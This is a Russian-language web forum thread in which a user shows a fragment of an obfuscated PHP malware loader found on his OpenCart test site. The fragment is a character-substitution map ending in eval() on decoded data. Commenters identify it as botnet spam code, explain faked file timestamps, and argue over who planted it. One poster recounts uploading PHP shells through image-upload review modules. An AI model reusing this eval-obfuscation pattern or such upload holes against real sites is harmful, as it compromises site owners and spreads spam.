спам рассылка

[vasilev86]

есть файл во вложении, внутри

 'B', '0'=>'f', '3'=>'2', '2'=>'u', '5'=>'p', '4'=>'c', '7'=>'5', '6'=>'R', '9'=>'d', '8'=>'8', 'A'=>'V', 'C'=>'t', 'B'=>'E', 'E'=>'M', 'D'=>'x', 'G'=>'l', 'F'=>'1', 'I'=>'G', 'H'=>'r', 'K'=>'3', 'J'=>'A', 'M'=>'4', 'L'=>'6', 'O'=>'v', 'N'=>'m', 'Q'=>'H', 'P'=>'z', 'S'=>'b', 'R'=>'U', 'U'=>'s', 'T'=>'J', 'W'=>'O', 'V'=>'W', 'Y'=>'I', 'X'=>'k', 'Z'=>'7', 'a'=>'S', 'c'=>'Z', 'b'=>'Y', 'e'=>'Q', 'd'=>'L', 'g'=>'D', 'f'=>'w', 'i'=>'T', 'h'=>'P', 'k'=>'q', 'j'=>'o', 'm'=>'n', 'l'=>'9', 'o'=>'j', 'n'=>'X', 'q'=>'i', 'p'=>'e', 's'=>'F', 'r'=>'g', 'u'=>'N', 't'=>'K', 'w'=>'0', 'v'=>'C', 'y'=>'y', 'x'=>'a', 'z'=>'h'); eval/*mnfldqnd*/(ujmkbvoru($nhlglmduev, $clwksr));?>

 

может эта фигня рассылать спам рассылку? 

также скрин с панели управления

view79.php

[markimax]

Да, может в принципе, но надо детально смотреть

[n3bo]

eval

[vasilev86]

25 минут назад, n3bo сказал:

eval

это ?

самый распространенный случай исполнения вредоносного кода. Подобная структура файла обозначает, что в файле содержится вирусная сигнатура, которая исполняется посредством функции php eval() и декодируется через base64. Сочетание функции eval(base64_decode самое распространенное во вредоносных скриптах, так как она позволяет исполнять вредоносный код, который находится в закодированном виде, тем самым затрудняя анализ когда

[n3bo]

Обратитесь к halfhope, он занимается подобным. Дорого, но с гарантией делает.

Вам недостаточно сейчас удалить файл и поправить что-либо, Вам нужно найти дыру, через которую это попало к Вам, т.к. почистив все - завтра опять может повториться.

[vasilev86]

мне не надо его удалять, закрывать, править..

Мне нужно знать когда он появился( день, месяц, год) и залит был с опенкартом, шаблоном или позже.

[vasilev86]

написал Талгату, пока молчит.

Я не с того начал - ситуация следующая ,этот домен( хостинг) создан для тестирования настроек и для тестовых заданий для новичков с форума.

Мне не надо это исправлять, мне нужно знать кто.

[AlexDW]

1 час назад, vasilev86 сказал:

Мне нужно знать когда он появился

у вас на скринах даты изменения файлов указаны

 

39 минут назад, vasilev86 сказал:

мне нужно знать кто

для этого нужно изучать логи (как вариант - отталкиваясь от даты изменения)

[vasilev86]

даты я видел, но мне надо на 100 % быть уверенным что это именно этот файл.

[vasilev86]

Спасибо всем кто откликнулся, не удалось выяснить кто закинул вирусы.

Замечу от себя, установкой ocStore и Шаблон "Magazin" для ocStore/Opencart  в этот период времени занимался Валерий - kvr66

[markimax]

4 минуты назад, vasilev86 сказал:

Спасибо всем кто откликнулся, не удалось выяснить кто закинул вирусы.

 

Ну.. не думаю что кто у нас с форума будет заниматься такой ...
Репутация дороже денег
Скорее всего сломали хостера или соседей или ... поставили условно - бесплатный модуль (shareware), где скорее всего в лицензии было написано, что они "имеют право" рассылать "спам" в обмен на "использование" модуля. Сейчас очень много "вирусов" (под windows и т п) используют такую тактику и антивирусы не имеют право даже удалять их (лицензионное соглашение на использование "программы"). Т .е. типа программа "декодер" а в условиях лицензионного соглашения написано на 100500 странице что используя его вы разрешаете использовать свой компьютер в любых целях.

[vasilev86]

Надеюсь на это, но хост работает с 23.02.2016 куплен домен, куплен дополнительная лицензия на шаблон + дополнительная лицензия на обмен 1с и я своими прямыми руками там игрался.

01.03.2017 было все снесено и установлен ocStore и Шаблон "Magazin" для ocStore/Opencart .

[markimax]

41 минуту назад, vasilev86 сказал:

Надеюсь на это, но хост работает с 23.02.2016 куплен домен, куплен дополнительная лицензия на шаблон + дополнительная лицензия на обмен 1с и я своими прямыми руками там игрался.

01.03.2017 было все снесено и установлен ocStore и Шаблон "Magazin" для ocStore/Opencart .

 

Я не сомневаюсь в вашей порядочности. Может установили какой бесплатный модуль (я писал чем на само деле он может оказаться)
Да и платных хватает с дырами. К примеру всем популярным модулям (на маркетплейсе opencart.com) отзывов с возможностью загрузки изображений я (при свидетелях, кстати с форума, ссылки на шеллы я им сразу показывал на серверах) загрузил шеллы (php бомбы) на их демки, почти всем.   И я не профи хакер, а обычный разработчик. Я представляю что могут сделать профи хакеры

[vasilev86]

15 минут назад, markimax сказал:

 

Я не сомневаюсь в вашей порядочности. Может установили какой бесплатный модуль (я писал чем на само деле он может оказаться)
Да и платных хватает с дырами. К примеру всем популярным модулям (на маркетплейсе opencart.com) отзывов с возможностью загрузки изображений я (при свидетелях, кстати с форума, ссылки на шеллы я им сразу показывал на серверах) загрузил шеллы (php бомбы) на их демки, почти всем.   И я не профи хакер, а обычный разработчик. Я представляю что могут сделать профи хакеры

Бесплатного модуля не было. 

ТЗ было установить ocstore и шаблон, что и было сделано.

Все что я смог проверить и сравнить сам, это время создания системных файлов и файлов с вирусами, совпадение до секунды.

Значит все это было загружено разом.

[snastik]

5 часов назад, vasilev86 сказал:

Бесплатного модуля не было. 

ТЗ было установить ocstore и шаблон, что и было сделано.

Все что я смог проверить и сравнить сам, это время создания системных файлов и файлов с вирусами, совпадение до секунды.

Значит все это было загружено разом.

 

Учим матчасть http://php.net/manual/ru/function.touch.php

Удивляемся, хватаем себя за лицо. Как просто оказывается поменять дату создания у файла. Ну а скопировать ее с index.php - это совсем совсем просто.
Скрипты ботнетов научились такое делать давным давно.

 

Выше приведенная вами сигнатура - это на 99.9% бот.

И вскочил он к вам не через фтп, а через admin/admin ну или еще что вы там "прямыми руками" у себя намудрили.

 

Так что заканчивайте тут брызгать ядом в силу своей некомпетенции и "намекать" бездоказательно на кого бы то ни было.

Если у вас есть пруф с логом ftp где есть дата заливки именно этого файла с конкретного айпи. Вопросов нет
Нету - тогда похоже вы сами побаловались варезятинкой, а теперь ищете крайних.

[JohnnyVega]

Учитывая репутацию ТС даже как-то не удивлён... Рано или поздно это должно было случиться, и случится ещё не раз...

 

Работа должна нормально оплачиваться. Если она не оплачивается нормально деньгами, она оплачивается вот таким образом: спам-росылки, шеллы и т.д, то бишь ресурсами сайта....

[vasilev86]

14 часов назад, snastik сказал:

 

Учим матчасть http://php.net/manual/ru/function.touch.php

Удивляемся, хватаем себя за лицо. Как просто оказывается поменять дату создания у файла. Ну а скопировать ее с index.php - это совсем совсем просто.
Скрипты ботнетов научились такое делать давным давно.

 

Выше приведенная вами сигнатура - это на 99.9% бот.

И вскочил он к вам не через фтп, а через admin/admin ну или еще что вы там "прямыми руками" у себя намудрили.

 

Так что заканчивайте тут брызгать ядом в силу своей некомпетенции и "намекать" бездоказательно на кого бы то ни было.

Если у вас есть пруф с логом ftp где есть дата заливки именно этого файла с конкретного айпи. Вопросов нет
Нету - тогда похоже вы сами побаловались варезятинкой, а теперь ищете крайних.

Спасибо, буду знать, я действительно этого не знал.

логи из панели управления исчезли,они были 100%, при первой рассылки я их видел, файлы изменены на view79.php.virus

[2017-03-13 20:18:07] logged
[2017-02-25 19:15:11] logged 

запрос поддержки тоже результата не дал.

Максим Владимирович	11.04.17 22:34
Здравствуйте К сожалению нет. Лог файлов за 1-го число у нас нет. Для хранения лог файлов необходимо активировать такую функцию в настройках домена - панель хостинга - Домены, напротив домена кнопка Настройки.

Валерия я указал для того, чтобы подтвердить что этим занимался не абы кто.

 

Цитата

 

Все что я смог проверить и сравнить сам, это время создания системных файлов и файлов с вирусами, совпадение до секунды.

Значит все это было загружено разом.

 

 

эти выводы я сделал по советам выше 

 

Цитата

у вас на скринах даты изменения файлов указаны

 

По поводу модулей с вареза

Я установил только SQL Query Time Log от Oтвета и все. 10.03.2107

Так он там и болтается.

 

06.03.2017 появился Local copy OCMOD by iSenseLabs, я не знаю что за модуль, но 10.03 его вроде не было, хотя я и не смотрел, т.к в админку практически не заходил.

 

 JohnnyVega

10 часов назад, JohnnyVega сказал:

Учитывая репутацию ТС даже как-то не удивлён... Рано или поздно это должно было случиться, и случится ещё не раз...

 

Работа должна нормально оплачиваться. Если она не оплачивается нормально деньгами, она оплачивается вот таким образом: спам-росылки, шеллы и т.д, то бишь ресурсами сайта....

Покажите хоть одного человека( исполнителя) которому я не заплатил ? или не доплатил ?  

Да, я не могу себе позволить работать с супер пупер программистами за $ 30  за правку , для меня это дорого.

 

Скорое всего  спамом не закончилось т.к потом пошли боты на основной сайт, где  AWARO , как JohnnyVega пытался делать выводы в сторону не доплаты, ребята это смешно.

 

[vilka]

34 минуты назад, vasilev86 сказал:

 

	11.04.17 22:34

 

06.03.2017 появился Local copy OCMOD by iSenseLabs, я не знаю что за модуль, но 10.03 его вроде не было, хотя я и не смотрел

 

 

Это дополнение для обхода загрузки через  FTP

[HyperLabTeam]

42 минуты назад, vasilev86 сказал:

По поводу модулей с вареза

Я установил только SQL Query Time Log от Oтвета и все. 10.03.2107

Так он там и болтается.

 

 

Скорое всего  спамом не закончилось т.к потом пошли боты на основной сайт, где  AWARO , как JohnnyVega пытался делать выводы в сторону не доплаты, ребята это смешно.

 

Установите кассовый апарат тож с вареза))
по поводу выводов - это стёб - на ваше *модули по триста - это дорого а развод от государства на всякие кассовые апараты в виде калькулятора 50х за 5 - 10к это норм*
улыбнитесь уже бедолага. спасибо что показали наконец кто вы есть.

к стати аваторы часто (не всегда) отражают юзеров в жизни)) подсознательный выбор называется)

[vasilev86]

1 минуту назад, vilka сказал:

 

Это дополнение для обхода загрузки через  FTP

спасибо, только что нашел информацию об этом дополнении, но зачем? если я доступы без проблем давал..

[HyperLabTeam]

Только что, vasilev86 сказал:

спасибо, только что нашел информацию об этом дополнении, но зачем? если я доступы без проблем давал..

для загрузки \ установки файлов без настроек FTP